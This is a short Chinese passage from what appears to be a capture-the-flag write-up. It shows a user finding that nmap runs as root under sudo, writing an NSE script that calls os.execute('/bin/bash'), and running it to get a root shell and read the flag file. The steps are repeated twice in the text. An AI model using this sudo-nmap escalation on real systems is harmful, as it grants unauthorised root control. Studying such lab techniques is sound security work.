0x03 找到提权点
sudo -l 查看用户当前可执行的sudo命令,发现nmap命令执行时以root身份执行,尝试编写提权脚本
echo "os.execute('/bin/bash')">demon.nse
nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
sudo nmap --script=/home/jens/demon.nse
执行此脚本
提权成功
进入到root,找到flag
cat /root/theflag.txt
sudo -l 查看用户当前可执行的sudo命令,发现nmap命令执行时以root身份执行,尝试编写提权脚本
echo "os.execute('/bin/bash')">demon.nse
nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
sudo nmap --script=/home/jens/demon.nse
执行此脚本
提权成功
进入到root,找到flag
cat /root/theflag.txt
Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.